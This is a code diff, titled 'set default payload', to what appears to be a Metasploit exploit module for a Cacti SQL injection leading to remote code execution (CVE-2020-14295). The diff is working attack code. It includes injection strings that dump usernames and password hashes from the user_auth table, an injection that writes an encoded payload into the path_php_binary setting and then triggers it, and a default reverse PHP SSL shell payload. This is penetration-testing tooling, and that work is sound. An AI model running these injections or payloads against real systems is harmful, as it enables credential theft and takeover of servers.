set default payload

modules/exploits/unix/http/cacti_filter_sqli_rce.rb

@@ -35,9 +35,10 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ],
             [ 'CVE', '2020-14295' ]
           ],
-        'Platform' => ['unix'],
         'Privileged' => false,
+        'Platform' => ['unix'],
         'Arch' => ARCH_CMD,
+        'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_php_ssl' },
         'Notes' =>
           {
             'Stability' => [ CRASH_SAFE ],
@@ -76,12 +77,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12')
         vprint_good("Version Detected: #{version}")
-        return Exploit::CheckCode::Appears
+        return CheckCode::Appears
       end
     rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+      CheckCode::Safe("#{peer} - Could not connect to the web service") # unknown maybe?
     end
-    Exploit::CheckCode::Safe("Cacti #{version} is not a vulnerable version.")
+    CheckCode::Safe("Cacti #{version} is not a vulnerable version.")
   end
 
   def exploit
@@ -93,6 +94,9 @@ class MetasploitModule < Msf::Exploit::Remote
         # https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png
         print_status('Dumping creds')
         res = inject("')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;")
+        return unless res
+        return if res.nil?
+
         res.body.split.each do |cred|
           /"(?<username>[^"]+)","(?<hash>[^"]+)"/ =~ cred
           next unless hash
@@ -114,23 +118,19 @@ class MetasploitModule < Msf::Exploit::Remote
       # "name","hex"
       # "","FEFCFF"
       # "/usr/bin/php","3"
-      php_binary = res.body.split.last.split(',')[0].gsub('"', '') # take last entry on page, and split to value
+      if res && !res.nil?
+        php_binary = res.body.split.last.split(',')[0].gsub('"', '') # take last entry on page, and split to value
+      end
+      fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
       print_good("path_php_binary: #{php_binary}")
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
 
       print_status('Uploading payload')
-      pload = Rex::Text.uri_encode(payload.encoded)
       begin
+        pload = "#{payload.encoded} #"
+        pload = Rex::Text.uri_encode(pload.gsub("'", "\\\\'"))
         inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';")
-
-        print_status('Triggering payload')
-        send_request_cgi(
-          'uri' => normalize_uri(target_uri.path, 'host.php'),
-          'keep_cookies' => true,
-          'vars_get' => {
-            'action' => 'reindex'
-          }
-        )
+        print_good('Executing Payload')
+        trigger
       ensure
         resetsqli(php_binary)
       end
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
     /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
-    fail_with(Failure::UnexpectedReply, 'Unable to find CSRF token') unless csrf
+    fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf
 
     print_good("CSRF: #{csrf}")
 
@@ -187,6 +187,16 @@ class MetasploitModule < Msf::Exploit::Remote
     res
   end
 
+  def trigger
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'host.php'),
+      'keep_cookies' => true,
+      'vars_get' => {
+        'action' => 'reindex'
+      }
+    )
+  end
+
   def resetsqli(php_binary)
     print_status('Cleaning up environment')
     login # any subsequent requests with our cookie will fail, so we'll need to login a 2nd time to reset the database value correctly